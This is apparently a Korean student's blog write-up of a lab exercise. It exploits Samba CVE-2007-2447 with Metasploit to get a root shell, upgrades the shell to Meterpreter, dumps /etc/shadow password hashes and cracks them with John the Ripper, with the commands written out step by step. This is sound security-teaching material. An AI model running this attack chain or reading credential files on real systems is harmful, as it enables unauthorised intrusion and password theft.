[๋ชจ์˜ํ•ดํ‚น] John the Ripper๋ฅผ ํ™œ์šฉํ•œ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ํฌ๋ž™

2025. 2. 28. 14:00ยท๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น
728x90
๋ฐ˜์‘ํ˜•

! ์ด ํฌ์ŠคํŠธ์˜ ๋‚ด์šฉ์€ (2019๋…„)  ์ „๊ณต ๊ฐ•์˜์—์„œ ๋‹ค๋ฃฌ ๋ฆฌ๋ˆ…์Šค ๋ณด์•ˆ ์‹ค์Šต์˜ ๊ธฐ๋ก์šฉ์ด๋ฉฐ, ์ด๋Š” ํ•™์Šต ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉ๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

! ์–ด๋– ํ•œ ๊ฒฝ์šฐ์—๋„ ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์•…์šฉํ•˜๊ฑฐ๋‚˜ ๋ถˆ๋ฒ•์ ์ธ ํ™œ๋™์— ์‚ฌ์šฉํ•ด์„œ๋Š” ์•ˆ ๋ฉ๋‹ˆ๋‹ค.

 

! ๋ชจ์˜ ํ•ดํ‚น๊ณผ ๊ด€๋ จ๋œ ์‹ค์Šต์€ ํ•ฉ๋ฒ•์ ์ธ ํ™˜๊ฒฝ์—์„œ๋งŒ ์ˆ˜ํ–‰๋˜์–ด์•ผ ํ•˜๋ฉฐ, ๋ฌด๋‹จ์œผ๋กœ ๋‹ค๋ฅธ ์‚ฌ๋žŒ์˜ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•˜๋Š” ๋“ฑ์˜ ํ–‰์œ„๋Š” ๋ฒ•์ ์ธ ๋ฌธ์ œ๋กœ ์ด์–ด์งˆ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๊ธฐ์ˆ ์„ ์‚ฌ์šฉํ•  ๋•Œ์—๋Š” ํ•ญ์ƒ ์œค๋ฆฌ์ ์ธ ์ฑ…์ž„์„ ๊ฐ–๊ณ  ํ–‰๋™ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

 

 

๐Ÿ’ก ์ทจ์•ฝ์  ์ •๋ฆฌ

Samba๋Š” ๋ฆฌ๋ˆ…์Šค/์œ ๋‹‰์Šค ์‹œํ…œ์—์„œ Windows์™€ ํŒŒ์ผ ๋ฐ ํ”„๋ฆฐํ„ฐ ๊ณต์œ ๋ฅผ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ด์ฃผ๋Š” ์„œ๋น„์Šค๋‹ค.

Windows์˜ SMB(Server Message Block) ํ”„๋กœํ† ์ฝœ์„ ๊ตฌํ˜„ํ•œ ์˜คํ”ˆ์†Œ์Šค ์†Œํ”„ํŠธ์›จ์–ด๋ฅผ ๋งํ•œ๋‹ค.

 

ํ•˜์ง€๋งŒ ์˜ค๋ž˜๋œ samba ๋ฒ„์ „์€ ์—ฌ๋Ÿฌ ๊ฐ€์ง€ ์ทจ์•ฝ์ ``cve``์ด ์กด์žฌํ•ด์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ์›๊ฒฉ์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๊ฑฐ๋‚˜ ๋ฃจํŠธ ๊ถŒํ•œ์„ ํƒˆ์ทจ ํ•  ์ˆ˜ ์žˆ๋‹ค. 

 

๐Ÿ“Œ Samba usermap_script ์ทจ์•ฝ์  ๊ฐœ์š” (CVE-2007-2447)

  • ์˜ํ–ฅ๋ฐ›๋Š” ์†Œํ”„ํŠธ์›จ์–ด: Samba 3.0.0 ~ 3.0.25rc3
  • ์ทจ์•ฝ์  ์œ ํ˜•: User-Supplied Data Command Injection
  • ๊ณต๊ฒฉ ๋‚œ์ด๋„: ๋‚ฎ์Œ (์ต๋ช… ์ ‘๊ทผ ๊ฐ€๋Šฅ)
  • ๊ณต๊ฒฉ ๊ฒฐ๊ณผ: ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ (RCE)
  • ๊ณต๊ฒฉ ๋ฐฉ์‹: ``username`` ํ•„๋“œ๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ๋ช…๋ น ์‹คํ–‰

์ด ์ทจ์•ฝ์ ์€ Samba์˜ ``username map script`` ๊ธฐ๋Šฅ์—์„œ ๋ฐœ์ƒํ•˜๋Š” ๋ช…๋ น ์ฃผ์ž…(Command Injection) ๋ฌธ์ œ๋กœ ์ธํ•ด ์•…์šฉ๋  ์ˆ˜ ์žˆ๋‹ค.

 

๐Ÿ”ธ๊ณต๊ฒฉ ๋ฐฉ์‹

  • Samba์˜ ``username map script`` ์˜ต์…˜์€ ์ž˜๋ชป๋œ ๋ฐฉ์‹์œผ๋กœ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฌธ์ œ๋ฅผ ์•…์šฉํ•ด์„œ ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰(RCE)์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋‹ค.
  • ์ฆ‰, Samba ์„œ๋ฒ„๊ฐ€ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์„ ์ ์ ˆํ•˜๊ฒŒ ๊ฒ€์ฆํ•˜์ง€ ์•Š์•„์„œ ๊ณต๊ฒฉ์ž๊ฐ€ ๋ช…๋ น์–ด๋ฅผ ์ฃผ์ž…ํ•˜์—ฌ ์›๊ฒฉ์—์„œ ์ฝ”๋“œ ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•˜๋‹ค.
  • ์„ฑ๊ณตํ•˜๋ฉด ๋ฆฌ๋ˆ…์Šค ์‰˜์„ ์–ป์„ ์ˆ˜ ์ž‡๋‹ค.

๐Ÿ”ธ์ทจ์•ฝํ•œ Samba ๋ฒ„์ „

  • ``Samba 3.0.25rc3`` ์ดํ•˜ ๋ฒ„์ „
  • ๊ธฐ๋ณธ์ ์œผ๋กœ ๋ฆฌ๋ˆ…์Šค ๊ธฐ๋ฐ˜ ์„œ๋ฒ„์—์„œ ์‹คํ–‰๋จ
 

NVD - CVE-2007-2447

CVE-2007-2447 Detail Modified This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided. Description The MS-RPC functionality in smbd in Samba 3.0.0

nvd.nist.gov


1๏ธโƒฃ ์‹ค์Šต ํ™˜๊ฒฝ ๊ตฌ์„ฑ

๐Ÿ”น1. ๋„คํŠธ์›Œํฌ ๊ตฌ์กฐ

  • ๊ณต๊ฒฉ์ž (Attacker): Kali Linux
  • ํƒ€๊ฒŸ (Target): ์ทจ์•ฝํ•œ Samba ์„œ๋ฒ„

๐Ÿ”น2. ํ•„์ˆ˜ ๋„๊ตฌ ์„ค์น˜

  • ๊ณต๊ฒฉ ๋จธ์‹ (Kali Linux)์—์„œ ํ•„์š”ํ•œ ํˆด:
    • Metasploit Framework  (``msfconsole``): ์ต์Šคํ”Œ๋กœ์ž‡ ์‹คํ–‰์„ ์œ„ํ•œ ๋„๊ตฌ
    • John the Ripper (``john``): ํŒจ์Šค์›Œ๋“œ ํฌ๋ž™ ๋„๊ตฌ
  • ํƒ€๊ฒŸ ๋จธ์‹ (์ทจ์•ฝํ•œ Samba ์„œ๋ฒ„) ์„ค์ •:
    • Samba 3.0.20 ~ 3.0.24 ๋ฒ„์ „ ์„ค์น˜
    • ``usermap_script`` ์ทจ์•ฝ์ ์ด ์กด์žฌํ•˜๋Š” ์ƒํƒœ ์œ ์ง€

2๏ธโƒฃ Metasploit์„ ํ™œ์šฉํ•œ Samba ์ทจ์•ฝ์  ์ต์Šคํ”Œ๋กœ์ž‡

CVE-2007-2447 ์ทจ์•ฝ์ ์€ Samba์˜ usermap_script ๊ธฐ๋Šฅ์—์„œ ๋ฐœ์ƒํ•˜๋Š” ๋ช…๋ น์–ด ์‚ฝ์ž… ์ทจ์•ฝ์ ์ด๋‹ค.

์ฆ‰, ๊ณต๊ฒฉ์ž๊ฐ€ ์›๊ฒฉ์—์„œ ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์ ์ด๊ธฐ ๋•Œ๋ฌธ์—, ์ด๋ฅผ ํ™œ์šฉํ•˜๋ฉด root ๊ถŒํ•œ์„ ๊ฐ€์ง„ ์‰˜์„ ํš๋“ํ•  ์ˆ˜ ์žˆ๋‹ค.

 

๐Ÿ”น1. Metasploit ์‹คํ–‰

msfconsole

๐Ÿ”น2. ์ทจ์•ฝ์  ๊ณต๊ฒฉ์„ ์œ„ํ•œ ์„ค์ •

``exploit/multi/samba/usermap_scrip`` ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•ด์„œ Samba ์ทจ์•ฝ์ ์„ ์•…์šฉํ•˜์—ฌ usermap ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํ†ตํ•ด ์›๊ฒฉ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•œ๋‹ค.

use exploit/multi/samba/usermap_script
set payload cmd/unix/bind_ruby
set rhost <ํƒ€๊ฒŸ ์„œ๋ฒ„ IP>
exploit
  • ``use exploit/multi/samba/usermap_script``: ``usermap_script`` ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ์ต์Šคํ”Œ๋กœ์ž‡ ์‚ฌ์šฉ ์„ค์ •
  • ``payload cmd/unix/bind_ruby``: ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์— Ruby ์‰˜์„ ๋ฐ”์ธ๋”ฉ. ์›๊ฒฉ ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํŽ˜์ด๋กœ๋“œ ์„ค์ •
  • ``rhost <ํƒ€๊ฒŸ ์„œ๋ฒ„ IP>``: ๊ณต๊ฒฉํ•  ๋Œ€์ƒ ์„œ๋ฒ„์˜ IP๋ฅผ ์ง€์ •

์นจํˆฌ์— ์„ฑ๊ณตํ•˜๋ฉด Meterpreter ์„ธ์…˜์„ ํ†ตํ•ด ์‹œ์Šคํ…œ์„ ์ œ์–ดํ•  ์ˆ˜ ์žˆ๋‹ค.

  • ``whoami`` ์ž…๋ ฅ์„ ํ†ตํ•ด ํ˜„์žฌ root ๊ณ„์ • ๊ถŒํ•œ์„ ์ทจ๋“ํ•œ ๊ฒƒ์„ ํ™•์ธ ๊ฐ€๋Šฅํ•˜๋‹ค.
whoami


3๏ธโƒฃ Meterpreter ์„ธ์…˜ ์—…๊ทธ๋ ˆ์ด๋“œ

๐Ÿ”น1. ๊ธฐ์กด ์‰˜์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜

  • ์ต์Šคํ”Œ๋กœ์ž‡์œผ๋กœ ํš๋“ํ•œ cmd ์‰˜์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜
  • ``Ctrl+Z`` ํ‚ค๋ฅผ ๋ˆŒ๋Ÿฌ ํ˜„์žฌ ์„ธ์…˜์„ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜
Ctrl + Z

  • Metasploit ํ”„๋กฌํ”„ํŠธ์—์„œ ๋ฐฑ๊ทธ๋ผ์šด๋“œ๋กœ ์ „ํ™˜๋๋Š”์ง€ ํ™•์ธ
sessions
  • ํ˜„์žฌ ์„ธ์…˜ ID ํ™•์ธ


๐Ÿ”น2. Shell์„ Meterpreter๋กœ ๋ณ€ํ™˜

  • ``Shell_to_meterpreter`` ๋ชจ๋“ˆ ์‹คํ–‰
  • ํ˜„์žฌ ํ™œ์„ฑํ™”๋œ cmd ์‰˜์„ Meterpreter๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ๋ชจ๋“ˆ ์‚ฌ์šฉ
use post/multi/manage/shell_to_meterpreter
  • ์˜ต์…˜ ์„ค์ • (set ๋ช…๋ น์–ด)
  • ``SESSION 1`` > ๊ธฐ์กด cmd ์‰˜์„ ๋ณ€ํ™˜ํ•  ์„ธ์…˜ ์„ ํƒ
set SESSION 1
exploit
  • exploit ํ›„ Meterpreter ์„ธ์…˜์ด ์„ฑ๊ณต์ ์œผ๋กœ ์—ด๋ ธ์Œ


๐Ÿ”น3. Meterpreter ์„ธ์…˜ ํ™œ์„ฑํ™”

  • ํ˜„์žฌ ํ™œ์„ฑํ™”๋œ Meterpreter ์„ธ์…˜ ํ™•์ธ
sessions -l

  • Meterpreter ์„ธ์…˜ (ID 2๋ฒˆ)์ด ์„ฑ๊ณต์ ์œผ๋กœ ์—ด๋ฆผ
  • Meterpreter ์‹คํ–‰
sessions 2


4๏ธโƒฃ ๋ฆฌ๋ˆ…์Šค ์‹œ์Šคํ…œ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ๋คํ”„

์‹œ์Šคํ…œ์—์„œ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ๋ฅผ ์ถ”์ถœํ•˜๋Š” ๋‹จ๊ณ„์ด๋‹ค.

๋ฆฌ๋ˆ…์Šค์˜ ``/etc/shadow`` ํŒŒ์ผ์— ์ €์žฅ๋œ ํŒจ์Šค์›Œ๋“œ๋ฅผ ๊ฐ€์ ธ์™€์„œ ํฌ๋ž™ํ•  ์ˆ˜ ์žˆ๋‹ค.

 

๐Ÿ”น1. ํ•ด์‹œ ๋คํ”„

``post/linux/gather/hashdump``๋Š” Metasploit์—์„œ ๋ฆฌ๋ˆ…์Šค ์‹œ์Šคํ…œ์˜ ํ•ด์‹œ ์ •๋ณด๋ฅผ ๋คํ”„ํ•˜๋Š” ํฌ์ŠคํŠธ-์ต์Šคํ”Œ๋กœ์ž‡ ๋ชจ๋“ˆ์ด๋‹ค. ์ด ๋ชจ๋“ˆ์€ ๊ณต๊ฒฉ์ž๊ฐ€ ์‹œ์Šคํ…œ์— ์ ‘๊ทผํ•œ ํ›„, ์‚ฌ์šฉ์ž ๊ณ„์ •์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ๋ฅผ ๋คํ”„ํ•˜์—ฌ ํฌ๋ž™ํ•˜๊ฑฐ๋‚˜ ์ถ”๊ฐ€์ ์ธ ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•œ๋‹ค.

run post/linux/gather/hashdump
  • ``run post/linux/gather/hashdump``: ๋Œ€์ƒ ์‹œ์Šคํ…œ์—์„œ ์‚ฌ์šฉ์ž ๊ณ„์ •์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ๋ฅผ ๋คํ”„ํ•œ๋‹ค.
    • ๋ณดํ†ต ``hashdump``๋Š” ``/etc/shadow`` ํŒŒ์ผ์„ ์ฝ์–ด ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ๋ฅผ ๋คํ”„ํ•˜๋Š” ๋ฐฉ์‹์œผ๋กœ ๋™์ž‘ํ•œ๋‹ค.

  • ํ•˜๋‹จ์˜ Unshadowed Password File์„ ๋ณด๋ฉด ``/root/.msf4/loot/`` ๊ฒฝ๋กœ์— ํŒŒ์ผ์ด ์ €์žฅ๋œ๋‹ค.

5๏ธโƒฃ John the Ripper๋กœ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ํฌ๋ž™

๐Ÿ”น1. John the Ripper ์‹œ์ž‘

``john`` ๋ช…๋ น์–ด๋Š” John the Ripper๋ผ๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ํฌ๋ž™ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•ด์„œ, ๋คํ”„ํ•œ ํ•ด์‹œํŒŒ์ผ์„ ํฌ๋ž™ํ•˜๋Š”๋ฐ ์‚ฌ์šฉ๋œ๋‹ค.

  • ๋คํ”„๋œ ํ•ด์‹œ ํŒŒ์ผ์„ ``john`` ๋ช…๋ น์–ด๋กœ ํฌ๋ž˜ํ‚นํ•œ๋‹ค. 
  • ์ด ๋ช…๋ น์–ด๋Š” ํ•ด๋‹น ํ•ด์‹œ ํŒŒ์ผ์— ์ €์žฅ๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํฌ๋ž˜ํ‚นํ•˜๋Š” ์ž‘์—…์„ ์‹œ์ž‘ํ•œ๋‹ค.
  • ํฌ๋ž˜ํ‚น ์ง„ํ–‰์ƒํƒœ๋Š” ํ™”๋ฉด์— ํ‘œ์‹œ๋˜๋ฉฐ, ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ฐพ์„ ๋•Œ๊นŒ์ง€ ๊ณ„์† ์‹œ๋„๋œ๋‹ค.
john 20191030113208_default_192.168.255.149_linux.hashes_544817.txt

๐Ÿ”น2. ํ•ด์‹œ ํŒŒ์ผ ๋ณต์‚ฌ

``john`` ๋ช…๋ น์–ด๋กœ ๋น„๋ฐ€๋ฒˆํ˜ธ ํฌ๋ž˜ํ‚น์„ ์‹œ์ž‘ํ•˜๊ธฐ ์ „์—, ๋คํ”„๋œ ํ•ด์‹œ ํŒŒ์ผ์„ ํŠน์ • ์œ„์น˜๋กœ ๋ณต์‚ฌํ•ด๋†“๋Š” ๊ฒƒ์ด ์ข‹๋‹ค.

๋ณต์‚ฌ๋œ ํŒŒ์ผ์€ ์ดํ›„ ํฌ๋ž˜ํ‚น ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋œ๋‹ค.

cp ~/.msf4/loot/201903113208_default_192.168.255.149_linux.hashes_544817.txt /tmp/password.txt
  • ๋คํ”„๋œ ํ•ด์‹œ ํŒŒ์ผ์„ ``/tmp/password.txt``๋กœ ๋ณต์‚ฌํ•˜์—ฌ, ๋‹ค๋ฅธ ์ž‘์—…์— ์‚ฌ์šฉํ•˜๋„๋ก ํ•œ๋‹ค.


๐Ÿ”น3. John ์‹คํ–‰

  • ``john`` ํˆด์„ ์‚ฌ์šฉํ•˜์—ฌ, ``crypt`` ํฌ๋งท์œผ๋กœ ์ €์žฅ๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ ํŒŒ์ผ์„ ํฌ๋ž˜ํ‚นํ•œ๋‹ค.
john --format=crypt /tmp/password.txt
  • ``john``: ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ ํฌ๋ž˜ํ‚น ๋„๊ตฌ์ธ John the Ripper๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๋ช…๋ น์–ด
  • ``--format=crypt``: ``john``์—๊ฒŒ ์‚ฌ์šฉํ•  ํ•ด์‹œ ํฌ๋งท์„ ๋ช…์‹œํ•œ๋‹ค. ์—ฌ๊ธฐ์„œ ``crypt``๋Š” ๋ฆฌ๋ˆ…์Šค์—์„œ ๊ธฐ๋ณธ์ ์œผ๋กœ ์‚ฌ์šฉ๋˜๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด์‹œ ์•Œ๊ณ ๋ฆฌ์ฆ˜์ด๋‹ค
  • ``/tmp/password.txt``: ํฌ๋ž˜ํ‚นํ•  ํ•ด์‹œ๊ฐ€ ์ €์žฅ๋œ ํŒŒ์ผ ๊ฒฝ๋กœ

 

โœ”๏ธ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ``john`` ๋ช…๋ น์–ด ํ™•์ธ

 

โœ”๏ธ ์ง€์›๋˜๋Š” ํ•ด์‹œ ``format`` ๋ฆฌ์ŠคํŠธ ํ™•์ธ

  • John the Ripper๋Š” ๋‹ค์–‘ํ•œ ํ•ด์‹œ ํฌ๋งท์„ ์ง€์›ํ•œ๋‹ค.
  • ``john -list=formats`` ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ง€์›๋˜๋Š” ํฌ๋งท ๋ชฉ๋ก์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.


๐Ÿ”น3. ํฌ๋ž™๋œ ํŒจ์Šค์›Œ๋“œ ํ™•์ธ

  • ``john --show`` ๋ช…๋ น์–ด๋Š” John the Ripper๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํฌ๋ž˜ํ‚นํ•œ ํ›„ , ๊ทธ ๊ฒฐ๊ณผ๋กœ ์›๋ž˜์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ถœ๋ ฅํ•˜๋Š” ๋ช…๋ น์–ด์ด๋‹ค.
  • ์ด ๋ช…๋ น์–ด๋Š” ํฌ๋ž˜ํ‚น๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํ™•์ธํ•  ๋•Œ ์‚ฌ์šฉ๋œ๋‹ค.
john --show /tmp/password.txt


๐Ÿ”น4. ์ €์žฅ๋œ ํŒจ์Šค์›Œ๋“œ ํ™•์ธ

  • ๋งˆ์ง€๋ง‰์œผ๋กœ John the Ripper๋Š” ํฌ๋ž˜ํ‚น๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ``.pot`` ํŒŒ์ผ์— ์ €์žฅํ•œ๋‹ค.
  • ์ด ํŒŒ์ผ์„ ์—ด์–ด ์‹ค์ œ๋กœ ํฌ๋ž˜ํ‚น๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.
cat /root/.john/john.pot


 

728x90
๋ฐ˜์‘ํ˜•

'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด > ๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[๋ชจ์˜ํ•ดํ‚น] ์œˆ๋„์šฐ ์‹œ์Šคํ…œ ๊ถŒํ•œ ํƒˆ์ทจ ํ›„ ์„œ๋ฒ„ ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด๋…  (0) 2025.02.28
[๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ๋””๋ ‰ํ† ๋ฆฌ ์ด๋™ ๊ณต๊ฒฉ  (0) 2025.02.11
[๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ํŒŒ์ผ ์—…๋กœ๋“œ ๊ณต๊ฒฉ  (0) 2025.02.11
[๋ชจ์˜ํ•ดํ‚น] setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ  (0) 2025.02.11
[๋ชจ์˜ํ•ดํ‚น] Windows 2000 ๊ธฐ๋ฐ˜์˜ ์šด์˜์ฒด์ œ ์นจํˆฌํ•˜๊ธฐ  (0) 2025.02.10
'๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด/๋ชจ์˜ ํ•ดํ‚น' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€
  • [๋ชจ์˜ํ•ดํ‚น] ์œˆ๋„์šฐ ์‹œ์Šคํ…œ ๊ถŒํ•œ ํƒˆ์ทจ ํ›„ ์„œ๋ฒ„ ๋น„๋ฐ€๋ฒˆํ˜ธ ํ•ด๋…
  • [๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ๋””๋ ‰ํ† ๋ฆฌ ์ด๋™ ๊ณต๊ฒฉ
  • [๋ชจ์˜ํ•ดํ‚น] ์›น ์„œ๋น„์Šค ์ทจ์•ฝ์ ์„ ์ด์šฉํ•œ ํŒŒ์ผ ์—…๋กœ๋“œ ๊ณต๊ฒฉ
  • [๋ชจ์˜ํ•ดํ‚น] setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ
WISHee
WISHee
IT์™€ ๋ณด์•ˆ์— ๋Œ€ํ•œ ๊ณต๋ถ€ ๊ธฐ๋ก์„ ์ฐจ๊ณก์ฐจ๊ณก ์Œ“์•„๊ฐ€๋Š” ๊ธฐ์ˆ  ๋ธ”๋กœ๊ทธ ๐Ÿ›ก๏ธ๐Ÿ’ป
  • WISHee
    DevwithWish
    WISHee
  • ์ „์ฒด
    ์˜ค๋Š˜
    ์–ด์ œ
    • ๐ŸŒณ ROOT (128)
      • โ›“๏ธ ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ (10)
        • ๊ธฐ๋ณธ ๊ฐœ๋… (9)
        • ํŒจํ‚ท ๋ถ„์„ (1)
        • ์นจ์ž… ํƒ์ง€ ๋ฐ ๋ฐฉ์ง€ (0)
      • โš™๏ธ ์‹œ์Šคํ…œ ๋ณด์•ˆ (0)
        • ์šด์˜์ฒด์ œ ๋ณด์•ˆ (0)
        • ์ทจ์•ฝ์  ๋ถ„์„ (0)
        • ๋กœ๊ทธ ๋ถ„์„ (0)
      • ๐ŸŒ ์›น ๋ณด์•ˆ (1)
        • OWASP TOP 10 (1)
        • ์›น ์„œ๋ฒ„ ๋ณด์•ˆ (0)
        • ์›น ์ทจ์•ฝ์  ๋ถ„์„ (0)
      • โ˜๏ธ ํด๋ผ์šฐ๋“œ ๋ณด์•ˆ (3)
        • AWS (3)
      • ๐Ÿ” ์•”ํ˜ธํ™” & ์ธ์ฆ (3)
        • ์•”ํ˜ธํ™” ๊ฐœ๋… (2)
        • TLS,SSL (0)
        • ์ธ์ฆ & ์ ‘๊ทผ์ œ์–ด (1)
      • ๐Ÿšจ ๋ณด์•ˆ ์‹ค๋ฌด (30)
        • ๋ณด์•ˆ ๊ด€์ œ (14)
        • ๋ชจ์˜ ํ•ดํ‚น (12)
        • ์ทจ์•ฝ์  ์ง„๋‹จ (3)
        • ๋””์ง€ํ„ธํฌ๋ Œ์‹ (1)
      • ๐Ÿ“š ISMS & ISO27001 (9)
        • ISMS, ISMS-P ์ธ์ฆ (2)
      • ๐Ÿ“ฐ ๋ณด์•ˆ ๋‰ด์Šค & ํŠธ๋ Œ๋“œ (1)
        • ์ตœ์‹  ๋ณด์•ˆ ์ด์Šˆ (1)
        • ์‚ฌ์ด๋ฒ„ ์œ„ํ˜‘ ์ •๋ณด (0)
        • ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค ๋ฆฌ๋ทฐ (0)
      • ๐Ÿ”ฅ SKShieldusRookies (15)
        • Review (3)
        • PBL (0)
        • ๊ณผ์ œ (4)
        • ๋ชจ๋“ˆ ํ”„๋กœ์ ํŠธ (8)
        • ์ตœ์ข… ํ”„๋กœ์ ํŠธ (0)
      • ๐Ÿ—‚๏ธ Project (3)
        • SOAR (0)
        • BlockChain (3)
      • ๐Ÿงฉ Language (23)
        • Java (1)
        • Python (16)
        • Programmers (6)
      • ๐Ÿ‘ฅ ๋ฒ„์ „๊ด€๋ฆฌ & ํ˜‘์—…๋„๊ตฌ (9)
        • Git, GitHub (4)
        • etc (5)
      • ๐Ÿ’œ ์ผ์ƒ (21)
        • Boot Camp (4)
        • Study (6)
        • Travel (8)
        • Study Abroad (3)
  • ๋ธ”๋กœ๊ทธ ๋ฉ”๋‰ด

    • ํ™ˆ
    • ํƒœ๊ทธ
    • ๋ฐฉ๋ช…๋ก
  • ๋งํฌ

    • GitHub
  • ๊ณต์ง€์‚ฌํ•ญ

    • ๋ฐ˜๊ฐ‘์Šต๋‹ˆ๋‹ค!
  • ์ธ๊ธฐ ๊ธ€

  • ํƒœ๊ทธ

    git
    ํ•œ๋‹ฌ์—ฌํ–‰
    ์˜นํ”Œ๋ขฐ๋ฅด
    ๋ชจ์˜ํ•ดํ‚น
    ๋ธ”๋ก์ฒด์ธ์‹ค์Šต
    slack
    ์นผ๋ฆฌ๋ฆฌ๋ˆ…์Šค
    ์ฝ”๋”ฉํ…Œ์ŠคํŠธ
    ํŒŒ์ด์ฌ
    ๋ชฝ์ƒ๋ฏธ์…ธ
    ์ •๋ณด๋ณด์•ˆ
    ํ˜‘์—…๋„๊ตฌ
    ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค
    ํ”„๋ž‘์Šค์—ฌํ–‰
    sk์‰ด๋”์Šค๋ฃจํ‚ค์ฆˆ
    ์œˆ๋„์šฐ๋ณด์•ˆ
    ๋ณด์•ˆ์‹ค์Šต
    ํ”Œ๋ผ์Šคํฌ
    ๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ
    ์™€์ด์–ด์ƒคํฌ
    ๋Ÿฐ๋˜์—ฌํ–‰
    ์œ ๋Ÿฝ์—ฌํ–‰
    ํ•ด์™ธ์—ฌํ–‰
    ํŒŒ๋ฆฌ์—ฌํ–‰
    VSCode
    ๊นƒํ—ˆ๋ธŒ
    Python
    ์œ ๋Ÿฝํ•œ๋‹ฌ์—ฌํ–‰
    Github
    flask
  • ์ตœ๊ทผ ๋Œ“๊ธ€

  • ์ตœ๊ทผ ๊ธ€

  • 160x600
    250x250
  • hELLOยท Designed By์ •์ƒ์šฐ.v4.10.3
WISHee
[๋ชจ์˜ํ•ดํ‚น] John the Ripper๋ฅผ ํ™œ์šฉํ•œ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ํฌ๋ž™
์ƒ๋‹จ์œผ๋กœ

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”